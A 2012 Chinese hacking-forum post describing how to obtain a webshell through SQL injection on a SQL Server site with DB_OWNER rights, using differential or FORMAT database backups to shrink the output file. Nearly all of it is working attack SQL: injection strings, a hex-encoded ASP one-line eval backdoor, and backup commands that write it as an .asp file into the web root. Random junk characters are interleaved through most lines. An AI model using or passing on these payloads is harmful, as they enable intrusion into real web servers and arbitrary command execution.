找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2139|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:57:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
减少备份文件大小,得到可执行的webshell成功率提高不少
. V  h% |' y. j" C/ o3 l0 S8 l! H7 d( `. Y2 w
一利用差异备份. C" b$ b" f4 i; v) P  G
加一个参数WITH DIFFERENTIAL( ~8 F- e& Z: P* X
9 E" A; I4 T9 b& s# w$ b) R' p% D' b3 w
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
5 M: N+ ]; Q" g+ screate table [dbo].[xiaolu] ([cmd] [image]);+ v1 ?2 B& Y9 r6 N
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)7 w7 ]: q8 J; q( p5 p
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
# q6 M) h$ ]9 @" }9 V9 V$ i2 O. v3 W6 f$ k$ H# l% [3 z
二利用完全FORMAT
4 y. w. D' o4 v1 {: X  w; Y* p加一个参数WITH FROMAT
* x% W: c6 C8 t) M* W: `% }有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
6 {- w7 R8 I3 ]7 v; {) `& b0 q# j# N6 [9 a4 I. y6 `
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
$ D( D% B& E) D7 Icreate table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
) y/ ]! F. F1 f8 Q! Q) j9 udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT' D0 j5 M6 A  O/ ?6 {
9 X& {  i, e7 \
总的来说就是那么简单几句,下面以备份数据库model为例子
2 I( }* q7 V# {+ \4 _
. K/ |0 M  E7 d' Nid=1;use model create table cmd(str image);insert into cmd(str) values (”)1 Q+ a/ G9 B5 Q# y7 O5 J5 r0 B

8 n' O5 r  ^+ H, J) Kid=1;backup database model to disk=’你的路径‘ with differential,format;–
7 d0 I2 X) v' t" \1 T* U0 V: I# j/ p; R: R9 w+ J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表